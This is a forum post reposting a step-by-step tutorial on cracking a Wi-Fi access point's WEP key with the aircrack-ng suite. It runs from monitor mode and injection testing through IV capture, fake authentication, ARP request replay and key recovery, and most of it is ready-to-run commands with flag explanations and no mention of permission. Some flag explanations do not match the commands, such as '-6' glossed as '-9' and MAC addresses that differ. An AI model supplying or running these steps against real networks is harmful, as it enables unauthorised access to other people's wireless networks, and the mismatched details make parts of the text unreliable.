Jump to content
Nytro

Simple WEP Crack

Recommended Posts

Posted

CRACK WIFI – Simple WEP Crack

wifi-300x189.gif

Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Equipments used

Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)

Software : Backtrack 4 (Free download from BackTrack Linux - Penetration Testing Distribution)

Step 1 – Start the wireless interface in monitor mode on AP channel

    airmon-ng start wlan1 6

starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

    aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1

-9 means injection

-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

    airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

    aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

-1 means fake authentication

0 reassociation timing in seconds

-e infosec is the wireless network name

-a 00:14:6C:7E:40:80 is the access point MAC address

-h 00:0F:B5:88:AC:82 is our card MAC address

OR

aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

2 – Reauthenticate every 2 seconds.

-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.

-q 10 – Send keep alive packets every 10 seconds.

Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…

Run:

tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.

If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…

Run:

“tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

    aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

    aircrack-ng -b 00:1B:11:24:27:2E output*.cap

All Done! :)

Sursa: Crack Wifi | Hacking Articles

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...